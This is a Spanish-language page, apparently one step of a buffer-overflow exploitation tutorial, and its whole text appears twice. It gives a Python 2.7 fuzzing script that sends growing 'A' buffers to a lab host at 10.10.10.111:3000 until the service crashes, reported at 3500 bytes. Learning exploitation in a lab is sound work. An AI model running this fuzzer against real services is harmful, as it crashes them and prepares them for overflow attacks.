Fuzzing

Este paso es para obtener el valor de los bytes en que crashea el binario:

#!/usr/bin/python2.7
import sys, socket
from time import sleep

buffer = "A" * 100
# Si el binario no se crashea aumenta el valor de 100 a 1000-2000-3000
while True:
        try:
                s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
                s.connect(('10.10.10.111',3000))

                s.send(('FUNCION /.:/' + buffer))
                #s.send((buffer))
                #s.send((buffer+'\n'))
                s.close()
                sleep(1)
                buffer = buffer + "A"*100

        except:
                print "Fuzzing crashed at %s bytes" % str(len(buffer))
                sys.exit()

Guardar el numero de bytes en que se crashea.. (Maybe ctrl + c)

Para este ejemplo crashea en el 3500!

AnteriorSpiking SiguienteFinding the Offset

Última actualización hace 11 meses

¿Te fue útil?

Fuzzing

Este paso es para obtener el valor de los bytes en que crashea el binario:

#!/usr/bin/python2.7
import sys, socket
from time import sleep

buffer = "A" * 100
# Si el binario no se crashea aumenta el valor de 100 a 1000-2000-3000
while True:
        try:
                s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
                s.connect(('10.10.10.111',3000))

                s.send(('FUNCION /.:/' + buffer))
                #s.send((buffer))
                #s.send((buffer+'\n'))
                s.close()
                sleep(1)
                buffer = buffer + "A"*100

        except:
                print "Fuzzing crashed at %s bytes" % str(len(buffer))
                sys.exit()

Guardar el numero de bytes en que se crashea.. (Maybe ctrl + c)

Para este ejemplo crashea en el 3500!

AnteriorSpiking SiguienteFinding the Offset

Última actualización hace 11 meses

¿Te fue útil?